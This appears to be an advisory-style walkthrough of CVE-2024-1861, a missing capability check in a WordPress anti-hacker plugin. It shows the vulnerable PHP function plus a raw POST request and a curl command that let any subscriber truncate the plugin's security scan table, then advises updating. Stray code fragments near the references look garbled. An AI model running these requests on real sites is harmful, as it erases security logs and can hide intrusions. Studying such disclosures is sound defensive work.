CVE-2024-1861 - Exploiting the Anti Hacker Scan Plugin Vulnerability in WordPress
The WordPress ecosystem is home to thousands of plugins. One such plugin — Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan — promises to help site owners protect their websites. However, a major flaw uncovered in early 2024, assigned CVE-2024-1861, exposes websites to a potentially damaging attack.
In this exclusive walkthrough, we’ll explain what the vulnerability is, show how it can be exploited, and what steps you should take if you’re affected.
What is CVE-2024-1861?
CVE-2024-1861 impacts all versions of the “Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan” plugin up to, and including, version 4.52.
Issue:
The plugin fails to check user capabilities properly when executing the antihacker_truncate_scan_table() function on the backend. This lets any authenticated WordPress user — even subscribers — to call this function and empty out (truncate) the plugin’s scan table in the database.
Impact:
Attackers with even the lowest level of access can destroy valuable security scan records, potentially masking evidence of ongoing or previous attacks, or disrupting automated defense mechanisms.
What can they do?
Wipe out the plugin’s security scan records, erasing logs that admins might use to spot hacking attempts.
How the Vulnerability Works
WordPress uses *capabilities* (like manage_options for admins) to restrict sensitive actions. The plugin’s antihacker_truncate_scan_table() function should check if the current user has the right capability. But in this case, it skips that check.
Vulnerable Function (Simplified PHP Snippet)
// Found in /include/antihacker-scan-table.php
function antihacker_truncate_scan_table() {
global $wpdb;
$scan_table = $wpdb->prefix . 'antihacker_scan_table';
$wpdb->query("TRUNCATE TABLE $scan_table");
// Plugin echoes success message
echo 'Scan table truncated!';
}
Missing:
No check like current_user_can('manage_options') to verify the user’s rights.
Step-by-Step Exploit Example
Let’s see how this can be abused. All an attacker needs is a WordPress subscriber account (often easy to register on open sites).
1. Log in as Any Subscriber
Most sites allow open registration. Sign up for a low-privilege user account.
2. Send a POST Request to the Vulnerable Action
The plugin uses a WordPress AJAX action (admin-ajax.php) that triggers the vulnerable function. Example:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_abcxyz; // your subscriber cookie
action=antihacker_truncate_scan_table
Code Sample using curl
curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php'; \
-H 'Cookie: wordpress_logged_in_abcxyz; ...' \
--data 'action=antihacker_truncate_scan_table'
3. Result
The scan table is instantly wiped clean, and a “Scan table truncated!” message is returned.
Original Reference Links
- Wordfence Advisory
- Plugin Page (WordPress.org)
- NIST NVD Entry (CVE-2024-1861)
}
// ...rest as above
}
Conclusion
CVE-2024-1861 reminds us that even plugins designed for defense can become vectors for attack. If you run the Anti Hacker Scan plugin at versions 4.52 or lower, update immediately and check your site for unusual log activity.
For more information, refer to the links above. If you believe your site may have been compromised, consult a security professional.
Timeline
Published on: 02/28/2024 09:33:35 UTC
Last modified on: 06/04/2024 17:59:57 UTC